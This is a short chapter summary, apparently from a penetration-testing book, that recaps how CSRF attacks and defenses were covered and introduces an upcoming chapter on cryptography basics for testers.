In this chapter, you learned about CSRF and how it abuses the trust relationship between the server and web browsers. You saw how to detect applications that may be vulnerable, reviewed an exploitation procedure, and practiced with an example, analyzing how it would work in web services. You also learned of a way to bypass token protection and the CORS and same-origin policies when combined with an XSS vulnerability.
As in previous chapters, the last section of this one was about defense. We reviewed recommended methods for preventing or mitigating CSRF vulnerabilities in your own applications or in those of your clients.
The next chapter will be a brief introduction to cryptography, focusing on the basics that a penetration tester needs to know, such as distinguishing between encryption, hashing and encoding, identifying weak cryptographic implementations and exploiting common vulnerabilities.